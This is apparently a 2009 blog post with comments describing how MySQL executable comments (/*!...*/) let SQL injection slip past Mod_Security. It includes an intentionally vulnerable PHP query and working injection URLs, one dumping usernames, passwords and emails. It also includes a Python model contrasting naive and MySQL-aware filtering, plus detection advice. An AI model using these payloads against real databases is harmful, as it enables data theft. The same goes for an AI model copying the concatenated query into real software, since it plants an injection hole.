October 28, 2009

Another fine method to exploit SQL Injection and bypass a WAF

A method that I discovered today in the MySQL documentation struck me with its simplicity and with the fact that I had not noticed it before. Let me describe this method of bypassing a WAF.

MySQL servers accept comments of the following two forms:

/*!sql-code*/ and /*!12345sql-code*/

As can be seen, in both cases the SQL code inside the comment is executed! The second form means that "sql-code" is executed only if the MySQL server version is greater than or equal to the given number, which is read as Mmmrr (major, minor, release), so 12345 stands for 1.23.45 and 50100 for 5.1.0. Any other DBMS, and most parsers, treat both forms as ordinary comments and skip them.

As I have repeatedly asserted [1,2], some WAFs skip comments during signature matching. Among them is the stable Mod_Security release 2.5.9.

Here is a simple example:

...
// Vulnerable on purpose: the raw GET parameter is concatenated into the query
$query = "SELECT name FROM table where id = ".$_GET['id'];

$result = mysql_query($query);
...

If the web application sits behind Mod_Security, the following request is blocked:

/?id=1+union+select+1

Remarkably, the WAF also blocks the following requests, built with the HPP/HPF techniques, even though they do not work against this particular example (the script uses only the id parameter, and PHP keeps just the last value of a repeated parameter, so the query would be cut to "id = */select ..."):

/?id=1+union/*&id=*/select+table_name+from+information_schema.columns

/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns


But with the executable-comment forms described above, Mod_Security lets the requests through and the SQL injection can be exploited:

/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/
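
To show why the comment-skipping filter misses the three requests above while the server happily runs them, here is a small Python model, added as an example and not code from the original post or from Mod_Security. It implements the two comment forms from the beginning of the post (unconditional /*!...*/ and version-gated /*!NNNNN...*/) the way the MySQL lexer treats them: the number after "!" is read as a decimal integer and compared with the server's MYSQL_VERSION_ID. It then runs the same "union select" signature over two views of the request: a naive view in which every /* ... */ block has been deleted, and a MySQL-aware view in which executable comment bodies are kept. The server version (5.1.40, i.e. 50140) and the request values are constructed for the demo; the payloads are the ones shown above.

```python
"""Added example (not from the original post): MySQL executable comments versus
a WAF that strips comments before signature matching.

Two views of the same request are compared:
  * naive filter: deletes every /* ... */ block, then matches signatures;
  * MySQL-aware view: keeps the body of /*! ... */ and /*!NNNNN ... */ when the
    server would execute it, so the signature sees what the server sees.
"""
import re
from urllib.parse import unquote_plus

# Assumption: the backend is MySQL 5.1.40. MySQL compares the number after '!'
# with its MYSQL_VERSION_ID, which packs major/minor/release as Mmmrr.
SERVER_VERSION_ID = 50140

# Group 1: '!' if this is an executable comment; group 2: optional version
# digits, read as a decimal integer (as the 5.x lexer does); group 3: body.
_COMMENT = re.compile(r"/\*(?:(!)([0-9]*))?(.*?)\*/", re.S)

# The signature the post says Mod_Security matched on the plain request.
_UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+|distinct\s+)?select\b", re.I)


def strip_all_comments(sql: str) -> str:
    """Naive WAF view: every /* ... */ block, executable or not, disappears."""
    return _COMMENT.sub(" ", sql)


def normalize_as_mysql(sql: str, version_id: int = SERVER_VERSION_ID) -> str:
    """Server view: plain comments vanish; /*!...*/ keeps its body unless the
    version gate (when present) is higher than the server version."""
    def unwrap(m):
        bang, digits, body = m.group(1), m.group(2), m.group(3)
        if bang is None:                          # ordinary comment: skipped
            return " "
        if digits and int(digits) > version_id:   # gated for a newer server: skipped
            return " "
        return f" {body} "                        # executed as SQL
    return _COMMENT.sub(unwrap, sql)


def build_query(id_param: str) -> str:
    """Mirrors the vulnerable PHP line: the decoded parameter is concatenated."""
    return "SELECT name FROM table where id = " + unquote_plus(id_param)


def naive_waf_blocks(id_param: str) -> bool:
    """True if the comment-stripping filter would flag the request."""
    return bool(_UNION_SELECT.search(strip_all_comments(build_query(id_param))))


def mysql_aware_waf_blocks(id_param: str, version_id: int = SERVER_VERSION_ID) -> bool:
    """True if a filter matching on what MySQL actually executes would flag it."""
    return bool(_UNION_SELECT.search(normalize_as_mysql(build_query(id_param), version_id)))


# Constructed request values: the post's payloads plus two controls.
SAMPLE_REQUESTS = {
    "plain":          "1+union+select+1",
    "bang":           "1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)"
                      "+from+information_schema.columns*/",
    "bang_versioned": "1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)"
                      "+from+information_schema.columns*/",
    "future_gate":    "1/*!99999union+select+1*/",   # gate above any 5.x server: MySQL skips it
    "plain_comment":  "1/*union+select+1*/",         # ordinary comment: MySQL skips it
}


if __name__ == "__main__":
    for name, value in SAMPLE_REQUESTS.items():
        print(f"{name:15} naive-blocks={naive_waf_blocks(value)!s:5} "
              f"mysql-aware-blocks={mysql_aware_waf_blocks(value)!s:5}")
        print("   server runs:", " ".join(normalize_as_mysql(build_query(value)).split()))
```

Running it shows the gap: the first request is caught by both views, while the two executable-comment payloads pass the naive filter and are caught only by the MySQL-aware one. The version-gated control with 99999 is skipped by a 5.1 server and therefore not flagged by the server-view model; a production rule would rather flag the "/*!" sequence outright, as the first comment below suggests, and treat any trailing digits as suspicious. None of this replaces the real fix for the PHP snippet above, which is a parameterized query instead of string concatenation.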

Well, one more method for the arsenal :-)

13 comments:

  1. Nice catch. It's easy to defend against, though -- just look for the "/*!" sequence in input.

  2. Additionally, you mention that v2.5.9 is the latest version, but v2.5.10 has been out stable for some time now. But, as Ivan mentioned above, you still need to edit the rules to look for "/*!".

    Thanks for the great article and work.

  3. I believe that 2.5.10 rules catch this (CRS v2.0.2). Thanks!
